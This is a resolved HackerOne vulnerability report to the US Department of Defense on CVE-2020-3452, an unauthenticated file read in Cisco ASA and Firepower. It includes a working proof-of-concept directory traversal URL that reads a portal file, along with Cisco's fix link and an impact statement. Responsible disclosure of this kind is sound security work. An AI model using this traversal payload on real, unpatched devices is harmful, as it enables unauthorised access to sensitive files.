CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

Disclosed: 2020-09-03 17:23:05 By amrr To deptofdefense
High
Vulnerability Details
**Summary:** #_The affected IP_: █████ Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. for example: ████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ## Suggested Mitigation/Remediation Actions Cisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 ## Impact This vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.
Actions
View on HackerOne
Report Stats
  • Report ID: 951508
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report